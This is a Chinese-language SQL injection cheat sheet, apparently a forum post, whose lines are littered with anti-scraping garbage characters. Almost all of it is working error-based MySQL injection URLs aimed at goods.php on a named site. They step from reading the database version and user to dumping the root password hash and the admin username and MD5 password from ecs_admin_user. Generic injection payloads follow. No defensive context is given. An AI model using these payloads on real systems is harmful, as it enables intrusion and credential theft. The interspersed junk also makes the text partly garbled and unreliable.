判断版本号
8 m" H& q) H' D Nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 W" g' y& n0 ~ n" x( |( A) z
$ p$ c) v4 r& z判断系统
3 `" n1 a3 V! l, y7 P( J5 n7 v( p1 ~# Y \% v: T% z1 i: J* y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 k; w8 {& t* x
1 H! W i3 h. o. d0 G: x# W" ^: H* P9 c) }. A" k% @6 P
- |; |" ?0 ~- M% i0 h7 H' Q+ o当前 user()2 Z) P3 N9 I+ d+ W! D! T
- _" E( }& `1 N: \http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 h5 J3 L9 x# \: H( y
/ X5 u6 L2 y" j9 r/ b/ d( O3 O+ E& }
, X/ m# z: `: @7 g+ {. Z
当前 database()& B. ~ Q2 b. h6 i9 _# [/ S
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ D$ u4 y( }( r2 D, H3 A
: H: a9 ?- B7 j2 S/ L0 b' m1 I' z8 R/ `) f$ |
# D* r( k) n3 n$ H( A" H/ `
$ {. u& Q, Z; q9 `/ q. Droot hash
( G* Y0 z2 Z( ]. F4 @) R* y% h: D; \" m
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 E: T% ~8 O# h& H# S5 _, I2 ~+ \" K1 a
2 _' W" h" M# Y) a% R
7 q ^, o% {0 w; S- u1 x当前 数据库表名
5 R3 ~3 [# d' b; }" C
3 D: v2 p5 }4 s) Xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- F8 I( v9 U1 M% |. _ ]5 G; N( w
) p& ^3 R; Y" `* V- i
1 d: s3 g) H* n7 ^
0 G$ C6 c/ S; n+ l# j当前 数据库 user_name 字段3 g0 ~% O) J3 c* z1 m
; @5 U$ n( A5 L$ Y2 f e. Ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# f i, ?7 W$ \
5 A4 y( g/ G/ D8 I& {. n* ^) h
当前 数据库 字段 password7 U" E# j. K, \8 V0 M5 |. C. j
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% m( j+ h; H6 N1 M
+ f! L) i6 Q a3 P& ?; f# [# T
2 z7 l7 n3 V9 J$ K
! g" I1 o7 |- r获得 admin passwd(md5)
z2 F( e7 t/ f! S: J0 Y+ U6 e; X
, r4 O3 z# K$ k, ?$ z8 v+ X7 v( J
+ i0 y5 n5 [, e$ w/ s2 t8 Thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 y0 F+ @# M9 p, z6 u: f. f9 @$ ]- n4 E2 F
报错注射
- s. p2 Y a2 C2 d1 w k6 s# CSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
. |, t. V& u9 g& @5 |' i
' n% V' L! P C4 C- ASELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
) I* X, i' @ n( p, r4 X' l* `+ @6 ?, u+ E5 i4 f3 ?) z" w4 ~
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |